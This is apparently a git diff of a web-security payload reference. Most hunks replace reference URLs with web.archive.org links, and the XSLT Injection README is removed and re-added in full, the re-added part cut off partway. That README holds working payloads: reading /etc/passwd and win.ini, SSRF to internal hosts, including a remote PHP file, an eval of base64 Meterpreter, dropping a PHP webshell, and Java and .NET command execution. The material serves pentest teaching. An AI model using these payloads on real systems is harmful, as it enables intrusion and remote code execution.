-* [Arbitrary File Upload Tricks In Java - pyn3rd - 2022-05-07](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
-* [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
+* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella - 28 Feb 2023](https://web.archive.org/web/20230228140105/https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
+* [Arbitrary File Upload Tricks In Java - pyn3rd - 2022-05-07](https://web.archive.org/web/20220601101409/https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
+* [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](https://web.archive.org/web/20200203171034/https://www.justanotherhacker.com:80/2011/05/htaccess-based-attacks.html)
 * [BookFresh Tricky File Upload Bypass to RCE - Ahmed Aboul-Ela - November 29, 2014](http://web.archive.org/web/20141231210005/https://secgeek.net/bookfresh-vulnerability/)
-* [Bulletproof Jpegs Generator - Damien Cauquil (@virtualabs) - April 9, 2012](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l)
-* [Encoding Web Shells in PNG IDAT chunks - phil - 04-06-2012](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
-* [File Upload - HackTricks - 20/7/2024](https://book.hacktricks.xyz/pentesting-web/file-upload)
-* [File Upload and PHP on IIS: >=? and <=* and "=. - Soroush Dalili (@irsdl) - July 23, 2014](https://soroush.me/blog/2014/07/file-upload-and-php-on-iis-wildcards/)
-* [File Upload restrictions bypass - Haboob Team - July 24, 2018](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
-* [IIS - SOAP - Navigating The Shadows - 0xbad53c - 19/5/2024](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
-* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
-* [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)
-* [Inyección de código en imágenes subidas y tratadas con PHP-GD - hackplayers - March 22, 2020](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
-* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February, 23 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
-* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - 21 Aug 2018](http://openwall.com/lists/oss-security/2018/08/21/2)
+* [Bulletproof Jpegs Generator - Damien Cauquil (@virtualabs) - April 9, 2012](https://web.archive.org/web/20130606125954/http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l)
+* [Encoding Web Shells in PNG IDAT chunks - phil - 04-06-2012](https://web.archive.org/web/20120610205435/http://www.idontplaydarts.com:80/2012/06/encoding-web-shells-in-png-idat-chunks)
+* [File Upload - HackTricks - 20/7/2024](https://web.archive.org/web/20241230150546/https://book.hacktricks.xyz/pentesting-web/file-upload)
+* [File Upload and PHP on IIS: >=? and <=* and "=. - Soroush Dalili (@irsdl) - July 23, 2014](https://web.archive.org/web/20231003035528/https://soroush.me/blog/2014/07/file-upload-and-php-on-iis-wildcards/)
+* [File Upload restrictions bypass - Haboob Team - July 24, 2018](https://web.archive.org/web/20180724174319/https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
+* [IIS - SOAP - Navigating The Shadows - 0xbad53c - 19/5/2024](https://web.archive.org/web/20220404084558/https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
+* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://web.archive.org/web/20191130061135/https://blog.isec.pl/injection-points-in-popular-image-formats/)
+* [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](https://web.archive.org/web/20190125123231/http://corb3nik.github.io:80/blog/insomnihack-teaser-2019/l33t-hoster)
+* [Inyección de código en imágenes subidas y tratadas con PHP-GD - hackplayers - March 22, 2020](https://web.archive.org/web/20260219153035/https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
+* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February, 23 2014](https://web.archive.org/web/20140416083530/http://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
+* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - 21 Aug 2018](https://web.archive.org/web/20180821130209/http://openwall.com/lists/oss-security/2018/08/21/2)
 * [PHDays - Attacks on video converters:a year later - Emil Lerner, Pavel Cheremushkin - December 20, 2017](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)
-* [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
-* [The .phpt File Structure - PHP Internals Book - October 18, 2017](https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
+* [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://web.archive.org/web/20200812181326/https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
+* [The .phpt File Structure - PHP Internals Book - October 18, 2017](https://web.archive.org/web/20260218185252/https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
diff --git a/Virtual Hosts/README.md b/Virtual Hosts/README.md
index 0d638a4..57c28de 100644
--- a/Virtual Hosts/README.md	
+++ b/Virtual Hosts/README.md	
@@ -89,5 +89,5 @@ Common indicators that you're hitting a different VHOST:
 
 ## References
 
-* [Gobuster for directory, DNS and virtual hosts bruteforcing - erev0s - March 17, 2020](https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/)
-* [Virtual Hosting – A Well Forgotten Enumeration Technique - Wyatt Dahlenburg - June 16, 2022](https://wya.pl/2022/06/16/virtual-hosting-a-well-forgotten-enumeration-technique/)
+* [Gobuster for directory, DNS and virtual hosts bruteforcing - erev0s - March 17, 2020](https://web.archive.org/web/20200925023215/https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/)
+* [Virtual Hosting – A Well Forgotten Enumeration Technique - Wyatt Dahlenburg - June 16, 2022](https://web.archive.org/web/20220616183823/https://wya.pl/2022/06/16/virtual-hosting-a-well-forgotten-enumeration-technique/)
diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md
index a77538c..b63d696 100644
--- a/Web Cache Deception/README.md	
+++ b/Web Cache Deception/README.md	
@@ -138,14 +138,14 @@ Exceptions and bypasses:
 
 ## References
 
-* [Cache Deception Armor - Cloudflare - May 20, 2023](https://developers.cloudflare.com/cache/cache-security/cache-deception-armor/)
-* [Exploiting cache design flaws - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
-* [Exploiting cache implementation flaws - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
-* [How I Test For Web Cache Vulnerabilities + Tips And Tricks - bombon (0xbxmbn) - July 21, 2022](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
-* [OpenAI Account Takeover - Nagli (@naglinagli) - March 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024)
-* [Practical Web Cache Poisoning - James Kettle (@albinowax) - August 9, 2018](https://portswigger.net/blog/practical-web-cache-poisoning)
-* [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Nagli (@naglinagli) - July 15, 2024](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
-* [Web Cache Deception Attack - Omer Gil - February 27, 2017](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
-* [Web Cache Deception Attack leads to user info disclosure - Kunal Pandey (@kunal94) - February 25, 2019](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
-* [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle (@albinowax) - August 5, 2020](https://portswigger.net/research/web-cache-entanglement)
-* [Web cache poisoning - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning)
+* [Cache Deception Armor - Cloudflare - May 20, 2023](https://web.archive.org/web/20230520042703/https://developers.cloudflare.com/cache/cache-security/cache-deception-armor/)
+* [Exploiting cache design flaws - PortSwigger - May 4, 2020](https://web.archive.org/web/20260117063619/https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
+* [Exploiting cache implementation flaws - PortSwigger - May 4, 2020](https://web.archive.org/web/20200919065854/https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
+* [How I Test For Web Cache Vulnerabilities + Tips And Tricks - bombon (0xbxmbn) - July 21, 2022](https://web.archive.org/web/20251213233158/https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
+* [OpenAI Account Takeover - Nagli (@naglinagli) - March 24, 2023](https://web.archive.org/web/20230412113849/https://twitter.com/naglinagli/status/1639343866313601024)
+* [Practical Web Cache Poisoning - James Kettle (@albinowax) - August 9, 2018](https://web.archive.org/web/20180810041437/https://portswigger.net/blog/practical-web-cache-poisoning)
+* [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Nagli (@naglinagli) - July 15, 2024](https://web.archive.org/web/20251010025345/https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
+* [Web Cache Deception Attack - Omer Gil - February 27, 2017](https://web.archive.org/web/20170308135717/https://omergil.blogspot.fr:80/2017/02/web-cache-deception-attack.html)
+* [Web Cache Deception Attack leads to user info disclosure - Kunal Pandey (@kunal94) - February 25, 2019](https://web.archive.org/web/20191217174659/https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
+* [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle (@albinowax) - August 5, 2020](https://web.archive.org/web/20200805185253/https://portswigger.net/research/web-cache-entanglement)
+* [Web cache poisoning - PortSwigger - May 4, 2020](https://web.archive.org/web/20200416160055/https://portswigger.net/web-security/web-cache-poisoning)
diff --git a/Web Sockets/README.md b/Web Sockets/README.md
index dcfd79b..2b3bd0b 100644
--- a/Web Sockets/README.md	
+++ b/Web Sockets/README.md	
@@ -162,10 +162,10 @@ in order to add this header.
 
 ## References
 
-* [Cross Site WebSocket Hijacking with socketio - Jimmy Li - August 17, 2020](https://blog.jimmyli.us/articles/2020-08/Cross-Site-WebSocket-Hijacking-With-SocketIO)
+* [Cross Site WebSocket Hijacking with socketio - Jimmy Li - August 17, 2020](https://web.archive.org/web/20201031111408/https://blog.jimmyli.us/articles/2020-08/Cross-Site-WebSocket-Hijacking-With-SocketIO)
 * [Hacking Web Sockets: All Web Pentest Tools Welcomed - Michael Fowl - March 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
-* [Hacking with WebSockets - Mike Shema, Sergey Shekyan, Vaagn Toukharian - September 20, 2012](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
+* [Hacking with WebSockets - Mike Shema, Sergey Shekyan, Vaagn Toukharian - September 20, 2012](https://web.archive.org/web/20120920142933/https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
 * [Mini WebSocket CTF - Snowscan - January 27, 2020](https://snowscan.io/bbsctf-evilconneck/#)
-* [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - July 18, 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
-* [Testing for WebSockets security vulnerabilities - PortSwigger - September 28, 2019](https://portswigger.net/web-security/websockets)
-* [WebSocket Attacks - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/websocket-attacks)
+* [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - July 18, 2023](https://web.archive.org/web/20230718132013/https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
+* [Testing for WebSockets security vulnerabilities - PortSwigger - September 28, 2019](https://web.archive.org/web/20190928112120/https://portswigger.net/web-security/websockets)
+* [WebSocket Attacks - HackTricks - July 19, 2024](https://web.archive.org/web/20241217220834/https://book.hacktricks.xyz/pentesting-web/websocket-attacks)
diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md
index d75445f..755b277 100644
--- a/XPATH Injection/README.md	
+++ b/XPATH Injection/README.md	
@@ -75,5 +75,5 @@ http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/S
 
 ## References
 
-* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
-* [XPATH Injection - OWASP - January 21, 2015](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
+* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://web.archive.org/web/20170325082934/http://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
+* [XPATH Injection - OWASP - January 21, 2015](https://web.archive.org/web/20240217030110/http://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
diff --git a/XS-Leak/README.md b/XS-Leak/README.md
index 1525c23..cfdd6e3 100644
--- a/XS-Leak/README.md
+++ b/XS-Leak/README.md
@@ -120,10 +120,10 @@ In a cache probing attack, a malicious website attempts to determine whether a s
 
 * [2025 SECCON CTF 14 Quals Web Challenges Writeup - RewriteLab - December 31, 2025](https://research.rewritelab.org/2025/12/31/%5BENG%5D%202025%20SECCON%20CTF%2014%20Quals%20Web%20Challenges%20Writeup/)
 * [ASIS CTF Finals 2024 - arkark - December 30, 2024](https://blog.arkark.dev/2024/12/30/asisctf-finals#web-fire-leak)
-* [Cross-Site ETag Length Leak - Takeshi Kaneko - December 26, 2025](https://blog.arkark.dev/2025/12/26/etag-length-leak)
-* [Exfiltration of secrets using an XS-Leaks - HackTM Secrets - xanhacks - February 19, 2023](https://www.xanhacks.xyz/p/secrets-hacktmctf/)
+* [Cross-Site ETag Length Leak - Takeshi Kaneko - December 26, 2025](https://web.archive.org/web/20260116095358/https://blog.arkark.dev/2025/12/26/etag-length-leak)
+* [Exfiltration of secrets using an XS-Leaks - HackTM Secrets - xanhacks - February 19, 2023](https://web.archive.org/web/20230323083337/https://xanhacks.xyz/p/secrets-hacktmctf/)
 * [Impossible Leak - SECCON 2025 Quals - parrot409 - December 14, 2025](https://gist.github.com/parrot409/e3b546d3b76e9f9044d22456e4cc8622)
-* [justCTF 2022 - Baby XSLeak Write-up - aszx87410 - June 14, 2022](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)
-* [Secret Note Keeper (xs-leaks) Facebook CTF 2019 - Abdillah Muhamad - July 3, 2019](https://abdilahrf.github.io/ctf/writeup-secret-note-keeper-fbctf-2019)
-* [SekaiCTF 2023 - Leakless Note - Kalmarunionen - September 5, 2023](https://www.kalmarunionen.dk/writeups/2023/sekai/leakless-notes/)
-* [XS-Leak: Leaking IDs using focus - Gareth Heyes - October 8, 2019](https://portswigger.net/research/xs-leak-leaking-ids-using-focus)
+* [justCTF 2022 - Baby XSLeak Write-up - aszx87410 - June 14, 2022](https://web.archive.org/web/20240816003707/https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)
+* [Secret Note Keeper (xs-leaks) Facebook CTF 2019 - Abdillah Muhamad - July 3, 2019](https://web.archive.org/web/20241214153926/https://abdilahrf.github.io/ctf/writeup-secret-note-keeper-fbctf-2019)
+* [SekaiCTF 2023 - Leakless Note - Kalmarunionen - September 5, 2023](https://web.archive.org/web/20230923073547/https://www.kalmarunionen.dk/writeups/2023/sekai/leakless-notes/)
+* [XS-Leak: Leaking IDs using focus - Gareth Heyes - October 8, 2019](https://web.archive.org/web/20251126101114/https://portswigger.net/research/xs-leak-leaking-ids-using-focus)
diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md
index deab2e5..272ba1d 100644
--- a/XSLT Injection/README.md	
+++ b/XSLT Injection/README.md	
@@ -1,252 +1,252 @@
-# XSLT Injection
-
-> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
-
-## Summary
-
-- [Tools](#tools)
-- [Methodology](#methodology)
-    - [Determine the Vendor And Version](#determine-the-vendor-and-version)
-    - [External Entity](#external-entity)
-    - [Read Files and SSRF Using Document](#read-files-and-ssrf-using-document)
-    - [Write Files with EXSLT Extension](#write-files-with-exslt-extension)
-    - [Remote Code Execution with PHP Wrapper](#remote-code-execution-with-php-wrapper)
-    - [Remote Code Execution with Java](#remote-code-execution-with-java)
-    - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
-- [Labs](#labs)
-- [References](#references)
-
-## Tools
-
-No known tools currently exist to assist with XSLT exploitation.
-
-## Methodology
-
-### Determine the Vendor and Version
-
-```xml
-<?xml version="1.0" encoding="utf-8"?>
-<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-  <xsl:template match="/fruits">
- <xsl:value-of select="system-property('xsl:vendor')"/>
-  </xsl:template>
-</xsl:stylesheet>
-```
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
-<body>
-<br />Version: <xsl:value-of select="system-property('xsl:version')" />
-<br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
-<br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
-</body>
-</html>
-```
-
-### External Entity
-
-Don't forget to test for XXE when you encounter XSLT files.
-
-```xml
-<?xml version="1.0" encoding="utf-8"?>
-<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
-<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-  <xsl:template match="/fruits">
-    Fruits &ext_file;:
-    <!-- Loop for each fruit -->
-    <xsl:for-each select="fruit">
-      <!-- Print name: description -->
-      - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
-    </xsl:for-each>
-  </xsl:template>
-</xsl:stylesheet>
-```
-
-### Read Files and SSRF Using Document
-
-```xml
-<?xml version="1.0" encoding="utf-8"?>
-<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-  <xsl:template match="/fruits">
-    <xsl:copy-of select="document('http://172.16.132.1:25')"/>
-    <xsl:copy-of select="document('/etc/passwd')"/>
-    <xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
-    Fruits:
-     <!-- Loop for each fruit -->
-    <xsl:for-each select="fruit">
-      <!-- Print name: description -->
-      - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
-    </xsl:for-each>
-  </xsl:template>
-</xsl:stylesheet>
-```
-
-### Write Files with EXSLT Extension
-
-EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language.
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:exploit="http://exslt.org/common" 
-  extension-element-prefixes="exploit"
-  version="1.0">
-  <xsl:template match="/">
-    <exploit:document href="evil.txt" method="text">
-      Hello World!
-    </exploit:document>
-  </xsl:template>
-</xsl:stylesheet>
-```
-
-### Remote Code Execution with PHP Wrapper
-
-Execute the function `readfile`.
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
-<body>
-<xsl:value-of select="php:function('readfile','index.php')" />
-</body>
-</html>
-```
-
-Execute the function `scandir`.
-
-```xml
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
-  <xsl:template match="/">
-    <xsl:value-of name="assert" select="php:function('scandir', '.')"/>
-  </xsl:template>
-</xsl:stylesheet>
-```
-
-Execute a remote php file using `assert`
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
-<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
-  <xsl:variable name="payload">
-    include("http://10.10.10.10/test.php")
-  </xsl:variable>
-  <xsl:variable name="include" select="php:function('assert',$payload)"/>
-</body>
-</html>
-```
-
-Execute a PHP meterpreter using PHP wrapper.
-
-```xml
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
-  <xsl:template match="/">
-    <xsl:variable name="eval">
-      eval(base64_decode('Base64-encoded Meterpreter code'))
-    </xsl:variable>
-    <xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>
-  </xsl:template>
-</xsl:stylesheet>
-```
-
-Execute a remote php file using `file_put_contents`
-
-```xml
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
-  <xsl:template match="/">
-    <xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','&lt;?php echo system($_GET[&quot;command&quot;]); ?&gt;')" />
-  </xsl:template>
-</xsl:stylesheet>
-```
-
-### Remote Code Execution with Java
-
-```xml
-  <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
-    <xsl:template match="/">
-      <xsl:variable name="rtobject" select="rt:getRuntime()"/>
-      <xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
-      <xsl:variable name="processString" select="ob:toString($process)"/>
-      <xsl:value-of select="$processString"/>
-    </xsl:template>
-  </xsl:stylesheet>
-```
-
-```xml
-<xml version="1.0"?>
-<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:java="http://saxon.sf.net/java-type">
-<xsl:template match="/">
-<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'cmd.exe /C ping IP')" xmlns:Runtime="java:java.lang.Runtime"/>
-</xsl:template>.
-</xsl:stylesheet>
-```
-
-### Remote Code Execution with Native .NET
-
-```xml
-<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App">
-    <msxsl:script implements-prefix="App" language="C#">
-      <![CDATA[
-        public string ToShortDateString(string date)
-          {
-              System.Diagnostics.Process.Start("cmd.exe");
-              return "01/01/2001";
-          }
-      ]]>
-    </msxsl:script>
-    <xsl:template match="ArrayOfTest">
-      <TABLE>
-        <xsl:for-each select="Test">
-          <TR>
-          <TD>
-            <xsl:value-of select="App:ToShortDateString(TestDate)" />
-          </TD>
-          </TR>
-        </xsl:for-each>
-      </TABLE>
-    </xsl:template>
-</xsl:stylesheet>
-```
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-xmlns:msxsl="urn:schemas-microsoft-com:xslt"
-xmlns:user="urn:my-scripts">
-
-<msxsl:script language = "C#" implements-prefix = "user">
-<![CDATA[
-public string execute(){
-System.Diagnostics.Process proc = new System.Diagnostics.Process();
-proc.StartInfo.FileName= "C:\\windows\\system32\\cmd.exe";
-proc.StartInfo.RedirectStandardOutput = true;
-proc.StartInfo.UseShellExecute = false;
-proc.StartInfo.Arguments = "/c dir";
-proc.Start();
-proc.WaitForExit();
-return proc.StandardOutput.ReadToEnd();
-}
-]]>
-</msxsl:script>
-
-  <xsl:template match="/fruits">
-  --- BEGIN COMMAND OUTPUT ---
- <xsl:value-of select="user:execute()"/>
-  --- END COMMAND OUTPUT --- 
-  </xsl:template>
-</xsl:stylesheet>
-```
-
-## Labs
-
-- [Root Me - XSLT - Code execution](https://www.root-me.org/en/Challenges/Web-Server/XSLT-Code-execution)
-
-## References
-
-- [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
-- [XSLT Injection - Fortify - January 16, 2021](http://web.archive.org/web/20210116001237/https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
-- [XSLT Injection Basics - Saxon - Hunnic Cyber Team - August 21, 2019](http://web.archive.org/web/20190821174700/https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
-- [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
-- [XSLT injection lead to file creation - PT SWARM (@ptswarm) - May 30, 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)
+# XSLT Injection
+
+> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
+
+## Summary
+
+- [Tools](#tools)
+- [Methodology](#methodology)
+    - [Determine the Vendor And Version](#determine-the-vendor-and-version)
+    - [External Entity](#external-entity)
+    - [Read Files and SSRF Using Document](#read-files-and-ssrf-using-document)
+    - [Write Files with EXSLT Extension](#write-files-with-exslt-extension)
+    - [Remote Code Execution with PHP Wrapper](#remote-code-execution-with-php-wrapper)
+    - [Remote Code Execution with Java](#remote-code-execution-with-java)
+    - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
+- [Labs](#labs)
+- [References](#references)
+
+## Tools
+
+No known tools currently exist to assist with XSLT exploitation.
+
+## Methodology
+
+### Determine the Vendor and Version
+
+```xml
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/fruits">
+ <xsl:value-of select="system-property('xsl:vendor')"/>
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+<body>
+<br />Version: <xsl:value-of select="system-property('xsl:version')" />
+<br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
+<br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
+</body>
+</html>
+```
+
+### External Entity
+
+Don't forget to test for XXE when you encounter XSLT files.
+
+```xml
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/fruits">
+    Fruits &ext_file;:
+    <!-- Loop for each fruit -->
+    <xsl:for-each select="fruit">
+      <!-- Print name: description -->
+      - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
+    </xsl:for-each>
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+### Read Files and SSRF Using Document
+
+```xml
+<?xml version="1.0" encoding="utf-8"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/fruits">
+    <xsl:copy-of select="document('http://172.16.132.1:25')"/>
+    <xsl:copy-of select="document('/etc/passwd')"/>
+    <xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
+    Fruits:
+     <!-- Loop for each fruit -->
+    <xsl:for-each select="fruit">
+      <!-- Print name: description -->
+      - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
+    </xsl:for-each>
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+### Write Files with EXSLT Extension
+
+EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language.
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<xsl:stylesheet
+  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+  xmlns:exploit="http://exslt.org/common" 
+  extension-element-prefixes="exploit"
+  version="1.0">
+  <xsl:template match="/">
+    <exploit:document href="evil.txt" method="text">
+      Hello World!
+    </exploit:document>
+  </xsl:template>
+</xsl:stylesheet>
+```
+
+### Remote Code Execution with PHP Wrapper
+
+Execute the function `readfile`.
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
+<body>
+<xsl:value-of select="php:function('readfile','index.php')" />
+</body>
+</html>
+```
+
+Execute the function `scandir`.
+
+```xml
